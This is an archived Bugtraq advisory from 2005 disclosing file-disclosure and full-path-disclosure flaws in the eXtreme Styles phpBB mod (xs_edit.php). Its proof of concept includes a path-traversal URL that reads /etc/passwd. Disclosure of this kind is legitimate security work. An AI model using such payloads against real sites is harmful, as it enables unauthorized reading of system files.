Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities

eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities

From: <tommie1_at_adelphia.net>
Date: 3 Dec 2005 13:29:02 -0000
('binary' encoding is not supported, stored as-is) eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities
====================================================
http://www.phpbbstyles.com/

Description
===========
These vulnerabilities could allow an attacker that has gained
administrative access view file content on the system.

1. Remote File Content Disclosure
=======================
In xs_edit.php, the "edit" request field is not properly sanitized.

2. Full Path Disclosure
=======================
In xs_edit.php, the "viewbackup" request field is not properly sanitized.

Proof of Concept
================
1. http://forum/admin/xs_edit.php?edit=../../../../etc/passwd
2. http://forum/admin/xs_edit.php?edit=&viewbackup=1

--------------
http://wtf.bz/
Received on Dec 03 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos